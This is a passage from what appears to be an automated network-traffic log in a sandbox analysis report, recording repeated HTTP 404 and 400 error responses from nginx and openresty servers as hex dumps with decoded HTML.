6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:04 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:18 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 37 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:18 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 37 3a 31 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:47:20 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 33 20 41 75 67 20 32 30 32 34 20 31 36 3a 34 37 3a 32 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a paddi
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:38 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:39 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:47:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 23 Aug 2024 16:47:51 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 23 Aug 2024 16:47:53 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page 